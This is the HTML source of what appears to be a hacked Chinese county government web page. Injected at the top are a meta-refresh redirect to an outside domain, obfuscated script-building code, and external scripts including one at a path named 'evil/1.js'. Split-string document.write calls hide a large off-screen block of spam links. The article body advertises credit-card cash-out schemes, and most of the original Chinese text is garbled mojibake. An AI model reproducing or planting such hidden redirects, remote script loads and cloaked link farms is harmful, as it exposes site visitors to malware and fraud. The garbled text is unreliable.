<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.zgjm-org.com">
<script> var xx="<scr"; xx=xx+"ipt>win"; xx=xx+"dow.loc"; xx=xx+"ation.hr"; xx=xx+"ef='http://"; xx=xx+"www."; xx=xx+"zgjm-org"; xx=xx+"."; xx=xx+"com"; xx=xx+"'<\/sc"; xx=xx+"ript>";// document.write(xx); </script>
<script/src=//alicdn.re.kr/re.kr></script>
<div class="a1b2c8d9e1" style="position:fixed;left:-3000px;top:-3000px;">
<a class="a1b2c8d9e1" href="http://www.fliggypig.com">http://www.fliggypig.com</a>
<a class="a1b2c8d9e1" href="http://www.4006000871.com">http://www.4006000871.com</a>
<a class="a1b2c8d9e1" href="http://www.ddabw.com">http://www.ddabw.com</a>
<a class="a1b2c8d9e1" href="http://www.ktiyl.com">http://www.ktiyl.com</a>
<a class="a1b2c8d9e1" href="http://www.abbwl.com">http://www.abbwl.com</a>
<a class="a1b2c8d9e1" href="http://www.rht365.com">http://www.rht365.com</a>
</div class="a1b2c8d9e1">
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script>
<a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a>
<a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a>
<a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a>
<a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a>
<a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a>
<a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a>
<a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a>
<a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a>
<a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a>
<a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a>
<a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a>
<a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a>
<a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a>
<a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a>
<a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a>
<a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a>
<a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a>
<a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a>
<a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a>
<a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a>
<a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a>
<a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a>
<a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a>
<a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a>
<a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a>
<a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a>
<a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a>
<a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a>
<a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a>
<a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a>
<a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a>
<a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a>
<a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a>
<a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a>
<a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a>
<a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a>
<a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a>
<a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a>
<a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a>
<a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a>
<a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a>
<a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a>
<a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a>
<a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a>
<a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a>
<a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a>
<a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a>
<a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a>
<a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a>
<a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a>
<a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a>
<a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a>
<a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a>
<a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a>
<a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a>
<a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a>
<a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a>
<a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a>
<a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a>
<a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a>
<a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a>
<a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a>
<a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a>
<a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a>
<a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a>
<a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a>
<a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a>
<a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a>
<a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a>
<a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a>
<a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a>
<a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a>
<a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a>
<a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a>
<a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a>
<a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a>
<a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a>
<a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a>
<a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a>
<a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a>
<a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a>
<a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a>
<a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a>
<a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a>
<a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a>
<a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a>
<a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a>
<a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a>
<a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a>
<a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a>
<a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a>
<a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a>
<a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a>
<a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a>
<a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a>
<a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a>
<a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a>
<a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a>
<a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a>
<a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a>
<a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a>
<a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a>
<a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a>
<a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a>
<a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a>
<a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a>
<a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a>
<a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a>
<a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a>
<a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a>
<a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a>
<a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a>
<a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a>
<a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a>
<a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a>
<a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a>
<a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a>
<a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a>
<a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a>
<a class="z7z8z9z6" href="http://www.cheng14.win/">http://www.cheng14.win/</a>
<a class="z7z8z9z6" href="http://www.shang72.win/">http://www.shang72.win/</a>
<a class="z7z8z9z6" href="http://www.sudanj.win/">http://www.sudanj.win/</a>
<a class="z7z8z9z6" href="http://www.russias.win/">http://www.russias.win/</a>
<a class="z7z8z9z6" href="http://www.malim.win/">http://www.malim.win/</a>
<a class="z7z8z9z6" href="http://www.nigery.win/">http://www.nigery.win/</a>
<a class="z7z8z9z6" href="http://www.malix.win/">http://www.malix.win/</a>
<a class="z7z8z9z6" href="http://www.peruf.win/">http://www.peruf.win/</a>
<a class="z7z8z9z6" href="http://www.iraqq.win/">http://www.iraqq.win/</a>
<a class="z7z8z9z6" href="http://www.nepali.win/">http://www.nepali.win/</a>
<a class="z7z8z9z6" href="http://www.syriax.win/">http://www.syriax.win/</a>
<a class="z7z8z9z6" href="http://www.junnp.pw/">http://www.junnp.pw/</a>
<a class="z7z8z9z6" href="http://www.junnp.win/">http://www.junnp.win/</a>
<a class="z7z8z9z6" href="http://www.zanpianba.com/">http://www.zanpianba.com/</a>
<a class="z7z8z9z6" href="http://www.shoujimaopian.com/">http://www.shoujimaopian.com/</a>
<a class="z7z8z9z6" href="http://www.gaoqingkanpian.com/">http://www.gaoqingkanpian.com/</a>
<a class="z7z8z9z6" href="http://www.kuaibokanpian.com/">http://www.kuaibokanpian.com/</a>
<a class="z7z8z9z6" href="http://www.baidukanpian.com/">http://www.baidukanpian.com/</a>
<a class="z7z8z9z6" href="http://www.wwwren99com.top/">http://www.wwwren99com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwdgshunyuancom.top/">http://www.wwwdgshunyuancom.top/</a>
<a class="z7z8z9z6" href="http://www.xianfengziyuancom.top/">http://www.xianfengziyuancom.top/</a>
<a class="z7z8z9z6" href="http://www.www96yyxfcom.top/">http://www.www96yyxfcom.top/</a>
<a class="z7z8z9z6" href="http://www.www361dywnet.top/">http://www.www361dywnet.top/</a>
<a class="z7z8z9z6" href="http://www.wwwbambootechcc.top/">http://www.wwwbambootechcc.top/</a>
<a class="z7z8z9z6" href="http://www.wwwluoqiqicom.top/">http://www.wwwluoqiqicom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwyyxfnrzcom.top/">http://www.wwwyyxfnrzcom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwzhengdadycom.top/">http://www.wwwzhengdadycom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwyewaishengcuncom.top/">http://www.wwwyewaishengcuncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwcong3win.top/">http://www.wwwcong3win.top/</a>
<a class="z7z8z9z6" href="http://www.wwwmh-oemcn.top/">http://www.wwwmh-oemcn.top/</a>
<a class="z7z8z9z6" href="http://www.henhen168com.top/">http://www.henhen168com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwhztuokuncom.top/">http://www.wwwhztuokuncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwyasyzxcn.top/">http://www.wwwyasyzxcn.top/</a>
<a class="z7z8z9z6" href="http://www.www9hkucom.top/">http://www.www9hkucom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwguokrcom.top/">http://www.wwwguokrcom.top/</a>
<a class="z7z8z9z6" href="http://www.avhhhhcom.top/">http://www.avhhhhcom.top/</a>
<a class="z7z8z9z6" href="http://www.shouyouaipaicom.top/">http://www.shouyouaipaicom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwdouyutvcom.top/">http://www.wwwdouyutvcom.top/</a>
<a class="z7z8z9z6" href="http://www.bbsptbuscom.top/">http://www.bbsptbuscom.top/</a>
<a class="z7z8z9z6" href="http://www.miphonetgbuscom.top/">http://www.miphonetgbuscom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwtjkunchengcom.top/">http://www.wwwtjkunchengcom.top/</a>
<a class="z7z8z9z6" href="http://www.lolboxduowancom.top/">http://www.lolboxduowancom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwtaoyuancncom.top/">http://www.wwwtaoyuancncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwngffwcomcn.top/">http://www.wwwngffwcomcn.top/</a>
<a class="z7z8z9z6" href="http://www.wwwqingzhouwanhecom.top/">http://www.wwwqingzhouwanhecom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwckyygcn.top/">http://www.wwwckyygcn.top/</a>
<a class="z7z8z9z6" href="http://www.wwwcdcjzcn.top/">http://www.wwwcdcjzcn.top/</a>
<a class="z7z8z9z6" href="http://www.m6downnet.top/">http://www.m6downnet.top/</a>
<a class="z7z8z9z6" href="http://www.msmzycom.top/">http://www.msmzycom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwcaobolcom.top/">http://www.wwwcaobolcom.top/</a>
<a class="z7z8z9z6" href="http://www.m3533com.top/">http://www.m3533com.top/</a>
<a class="z7z8z9z6" href="http://www.gmgamedogcn.top/">http://www.gmgamedogcn.top/</a>
<a class="z7z8z9z6" href="http://www.m289com.top/">http://www.m289com.top/</a>
<a class="z7z8z9z6" href="http://www.jcbnscom.top/">http://www.jcbnscom.top/</a>
<a class="z7z8z9z6" href="http://www.www99daocom.top/">http://www.www99daocom.top/</a>
<a class="z7z8z9z6" href="http://www.3gali213net.top/">http://www.3gali213net.top/</a>
<a class="z7z8z9z6" href="http://www.wwwmeidaiguojicom.top/">http://www.wwwmeidaiguojicom.top/</a>
<a class="z7z8z9z6" href="http://www.msz1001net.top/">http://www.msz1001net.top/</a>
<a class="z7z8z9z6" href="http://www.luyiluueappcom.top/">http://www.luyiluueappcom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwvcnnnet.top/">http://www.wwwvcnnnet.top/</a>
<a class="z7z8z9z6" href="http://www.wwwchaoaicaicom.top/">http://www.wwwchaoaicaicom.top/</a>
<a class="z7z8z9z6" href="http://www.mcnmocom.top/">http://www.mcnmocom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwqiuxia88com.top/">http://www.wwwqiuxia88com.top/</a>
<a class="z7z8z9z6" href="http://www.www5253com.top/">http://www.www5253com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwhaichuanwaiyucom.top/">http://www.wwwhaichuanwaiyucom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwulunarcn.top/">http://www.wwwulunarcn.top/</a>
<a class="z7z8z9z6" href="http://www.wwwvideo6868com.top/">http://www.wwwvideo6868com.top/</a>
<a class="z7z8z9z6" href="http://www.wwwythmbxgcom.top/">http://www.wwwythmbxgcom.top/</a>
<a class="z7z8z9z6" href="http://www.gakaycom.top/">http://www.gakaycom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwhf1zcom.top/">http://www.wwwhf1zcom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwkrd17net.top/">http://www.wwwkrd17net.top/</a>
<a class="z7z8z9z6" href="http://www.qqav4444net.top/">http://www.qqav4444net.top/</a>
<a class="z7z8z9z6" href="http://www.www5a78com.top/">http://www.www5a78com.top/</a>
<a class="z7z8z9z6" href="http://www.hztuokuncom.top/">http://www.hztuokuncom.top/</a>
<a class="z7z8z9z6" href="http://www.wwwqqqav7979net.top/">http://www.wwwqqqav7979net.top/</a>
<a class="z7z8z9z6" href="http://www.sscaoacom.top/">http://www.sscaoacom.top/</a>
<a class="z7z8z9z6" href="http://www.51yeyelu.info/">http://www.51yeyelu.info/</a>
<a class="z7z8z9z6" href="http://www.52luyilu.info/">http://www.52luyilu.info/</a>
<a class="z7z8z9z6" href="http://www.52yeyelu.info/">http://www.52yeyelu.info/</a>
<a class="z7z8z9z6" href="http://www.91yeyelu.info/">http://www.91yeyelu.info/</a>
<a class="z7z8z9z6" href="http://www.yeyelupic.info/">http://www.yeyelupic.info/</a>
<script>document.write ('</' + 'di' + 'v c' + 'l' + 'ass=' + '"' + 'z7z' + '8z9z' + '6' + '"' + '>');</script>
<!-------!><script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://www.aissxs.cc/1.js"></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<base target="_blank" />
<title>北京朝阳姚家园信用卡取现 - Í©°ØÕþÎñ¹«¿ªÍø - Í©°ØÏØÈËÃñÕþ¸®Ö÷°ì - www.tongbai.gov.cn</title>
<meta name="keywords" content="Í©°Ø,Í©°ØÏØ,Í©°ØÕþ¸®,Í©°ØÏØÕþ¸®,Í©°ØÈËÃñÕþ¸®,ÄÏÑôÍ©°Ø,ºÓÄÏÍ©°Ø,Í©°ØÈË" />
<meta name="deScRIpTion" content="Í©°ØÏØÈËÃñÕþ¸®ÍøÕ¾£¬½éÉÜÍ©°ØµØÇø¸Å¿ö¡¢Õþ¸®»ú¹¹¡¢ÕÐÉÌÐÅÏ¢µÈµÄ×ÛºÏÍøÕ¾¡£ÈȳÀµÄÍ©°ØÈË»¶ÓÄúµÄµ½À´£¡" />
<link href="http://tongbai.gov.cn/statics/css/old/style.css" rel="stylesheet" type="text/css">
<ScRIpT language="JavaScript">
<!--
//¸Ä±äͼƬ´óС
function resizepic(thispic)
{
return true;
}
//ÎÞ¼¶Ëõ·ÅͼƬ´óС
function bbimg(o)
{
return true;
}
-->
</ScRIpT>
<!--·ÖÏíCSSÑùʽµ÷ÓôúÂë BEGIN£¨´Ë´úÂë±ØÐ벿ÊðÔÚ</head>±ÕºÏ±ê¼Ç֮ǰ£©-->
<ScRIpT type="text/javaScRIpT">
var gwdshare = gwdshare || { version: "1.0", udata: "type=tools&uid=GWD-802542", pageFilter: "", jsLoaded: false };
(function () {
function async_load() {
var s = document.createElement('ScRIpT');
s.type = 'text/javaScRIpT';
s.async = true;
s.src = '//static.gridsumdissector.com/zheng_fen_xiang/ScRIpTs/gwdshareasync.min.js';
var x = document.getElementsByTagName('ScRIpT'), y = x[x.length - 1];
y.parentNode.appendChild(s);
}
if (!gwdshare.jsLoaded) {
if (window.attachEvent) window.attachEvent('onload', async_load);
else window.addEventListener('load', async_load, false);
gwdshare.jsLoaded = true;
}
})();
</ScRIpT>
<!--·ÖÏíCSSÑùʽµ÷ÓôúÂë END-->
</head>
<body bgcolor="#e6edf9">
<table width="960" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<base target="_blank" />
<title>Í©°ØÕþÎñ¹«¿ªÍø - Í©°ØÏØÈËÃñÕþ¸®Ö÷°ì - www.tongbai.gov.cn</title>
<meta name="keywords" content="Í©°Ø,Í©°ØÏØ,Í©°ØÕþ¸®,Í©°ØÏØÕþ¸®,Í©°ØÈËÃñÕþ¸®,ÄÏÑôÍ©°Ø,ºÓÄÏÍ©°Ø,Í©°ØÈË" />
<meta name="deScRIpTion" content="Í©°ØÏØÈËÃñÕþ¸®ÍøÕ¾£¬½éÉÜÍ©°ØµØÇø¸Å¿ö¡¢Õþ¸®»ú¹¹¡¢ÕÐÉÌÐÅÏ¢µÈµÄ×ÛºÏÍøÕ¾¡£ÈȳÀµÄÍ©°ØÈË»¶ÓÄúµÄµ½À´£¡"
/>
<link href="http://tongbai.gov.cn/statics/css/old/style.css" rel="stylesheet" type="text/css">
<ScRIpT type="text/javaScRIpT" src="http://tongbai.gov.cn/statics/css/old/for_tab.js"></ScRIpT>
</head>
<body>
<table width="1000" height="27" border="0" align="center" cellpadding="0" cellspacing="0" background="http://tongbai.gov.cn/statics/css/old/topttbg.jpg">
<tr>
<td><table width="990" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>»¶ÓÄú·ÃÎÊÍ©°ØÏØÕþ¸®ÃÅ»§ÍøÕ¾£¡</td>
<td width="30" align="center"><img src="http://tongbai.gov.cn/statics/css/old/gov.gif" width="13" height="15" /></td>
<td width="100"><a href="http://www.gov.cn" target="_blank">ÖÐÑëÕþ¸®ÃÅ»§Íø</a></td>
<td width="30" align="center"><img src="http://tongbai.gov.cn/statics/css/old/gov.gif" width="13" height="15" /></td>
<td width="100"><a href="http://www.nanyang.gov.cn" target="_blank">ÄÏÑôÊÐÈËÃñÕþ¸®</a></td>
</tr>
</table></td>
</tr>
</table>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><img src="http://tongbai.gov.cn/statics/css/old/topbg.jpg" width="1000" height="135" /></td>
</tr>
</table>
<table width="1000" height="35" border="0" align="center" cellpadding="0" cellspacing="0" background="http://tongbai.gov.cn/statics/css/old/menutopbg.jpg">
<tr>
<td><table width="990" border="0" align="center" cellpadding="0" cellspacing="0" class="amenu">
<tr>
<td width="90" align="center"><a href="/" target="_top">Ê×Ò³</a></td>
<td width="90" align="center"><a href="/html/tbgm/" target="_blank">Í©°Ø¸Åò</a></td>
<td width="90" align="center"><a href="/html/xxgkzn/" target="_blank">ÐÅÏ¢¹«¿ª</a></td>
<td width="90" align="center"><a href="/html/gmbs/" target="_blank">¹«¹²·þÎñ</a></td>
<td width="90" align="center"><a href="http://tongbai.gov.cn/index.php?m=content&c=index&a=lists&catid=280" target="_blank">½»Á÷»¥¶¯</a></td>
<td width="90" align="center"><a href="/html/xxgkml/" target="_blank">վȺµ¼º½</a></td>
<!--<td width="90" align="center"><a href="/html/flwj/" target="_blank">·¨¹æÎļþ</a></td>
<td width="90" align="center"><a href="/html/zfjd/" target="_blank">Ö´·¨¼à¶½</a></td>
<td width="90" align="center"><a href="/html/cxjs/" target="_blank">³ÇÏ罨Éè</a></td>
<td width="90" align="center"><a href="/html/zbtb/" target="_blank">ÕбêͶ±ê</a></td>-->
</tr>
</table></td>
</tr>
</table>
</body>
</html>
</td>
</tr>
</table>
<table width="1000" height="28" border="0" align="center" cellpadding="0" cellspacing="0" class="top5" style="background-image:url(http://tongbai.gov.cn/statics/css/old/dddh.jpg);">
<tr>
<td class="menu-dh" style="padding-left:30px;">½ñÈÕÍ©°Ø</td>
</tr>
</table>
<table width="1000" height="500" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td valign="top" class="gk_bg"><table width="680" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="20" align="center"></td>
</tr>
</tbody>
</table>
<!--startprint-->
<table width="950" height="50" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" class="topZ_tt">北京朝阳姚家园信用卡取现|°Ù¼ö<!-- GWD SHARE BEGIN ¸±±êÌâºóÃæÉÏϼýͷʽ·ÖÏí´úÂë-->
<span id="gwdShareMainDiv" style="display:inline; float:left; margin-top:25px;">
<div id="gwdShare_win_4" style="width:100px;float: left;position: relative;">
<span class="gwdtitle" style="line-height:15px;">·ÖÏí</span>
<div id="gwdShareUpDown_div" class="gwdShareArrow"></div>
<div id="gwdShare_con_4" style="display: none;height:118px;">
<div class="gwdshare_t gwds_tools_24 get-codes-gwdshare">
<a class="gwds_people gws_title_button"><span class="linkNameSpan" style="float:left; width:90px; margin:5px 4px 0 7px; font-size:12px;">ÈËÃñ΢²©</span></a>
<a class="gwds_tsina gws_title_button"><span class="linkNameSpan" style="float:left; width:90px; margin:5px 4px 0 7px; font-size:12px;">ÐÂÀË΢²©</span></a>
<a class="gwds_tqq gws_title_button"><span class="linkNameSpan" style="float:left; width:90px; margin:5px 4px 0 7px; font-size:12px;">ÌÚѶ΢²©</span></a>
<span class="gwds_more gws_title_more"></span>
</div>
</div>
</div>
</span>
<!-- GWD SHARE END --></td>
</tr>
</table>
<table width="950" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="20" align="center" class="gdggtop"></td>
</tr>
</tbody>
</table>
<table width="950" height="29" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#ffefdf">
<tr>
<td align="center" class="menu-zz">×÷Õߣº ¡¡ÎÄÕÂÀ´Ô´£º»·±£¾ÖÍøÕ¾ ¡¡Ê±¼ä£º2017-02-14 15:06:50</td>
</tr>
</table>
<table width="950" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#edc486">
<tbody>
<tr>
<td height="5"></td>
</tr>
</tbody>
</table>
<table width="950" border="0" align="center" cellpadding="0" cellspacing="0" class="bottom_20 Top_05">
<tbody>
<tr>
<td height="30"><table width="900" height="100" border="0" align="center" cellpadding="0" cellspacing="0" class="bottom_20">
<tr>
<td valign="top" class="topZ_txt news_txt"><div style="height:20px;"></div>
<div><span style="font-family: ËÎÌå"><span style="font-size: 18px"><p> 北京朝阳姚家园信用卡取现_☎¡¾159.21.65.06.98¡¿-【套现_取现_垫还_代还_养卡等业务!】欢迎来电咨询合作!谢谢!!!</p>
<p> <p><embed src="http://static.youku.com/v1.0.0149/v/swf/qplayer_rtmp.swf?VideoIDS=XNTQxMDU4Nzg0" allowFullScreen="true" quality="high" width="480" height="400" align="middle" allowScriptAccess="always"type="application/x-shockwave-flash"></embed></p>
<p>¡¡¡¡±àÕß°´£ºÂò¸öÓñÊÖïí£¬ÕæÊDz»Ê¡ÐÄ¡£ÂÃÓιºÎïµãµÄ±ê¼ÛºÍÕæÊµµÄÊг¡¼Û¿ÉÄÜÏà²îÊ®¼¸±¶ÉõÖÁ¸ü¶à£¬ÕâÓñµÄ¼Û¸ñ£¬µ½µ×Ë®·ÖÓжà´ó£¿</p>
<p>¡¡¡¡ÎªºÎÏû·ÑÕßÔ¸Òâ³ö¸ß¼Û¹ºÂò£¿ºÜ¶àÈ˵ÄÐÅÐͼÀ´×ÔÓÚ¸÷ÖÖȨÍþ¼ø¶¨ÖÐÐĸø³öµÄA¼¶Ö¤Ê飬¿ÉÊÇ£¬¼ÇÕß̽·Ã·¢ÏÖ£¬A¼¶Ö¤Ê龹Ȼ½ö½öÖ»ÄÜ˵Ã÷Õâ¸öÓñÊÖïíÕæµÄÊÇ¿éÌìȻʯͷ£¬²»ÊÇÈ˹¤ÔìµÄ£¬²¢²»ÄܶÔÓñÆ÷µÄ¼Û¸ñÆðÈκα³Êé×÷Óá£</p>
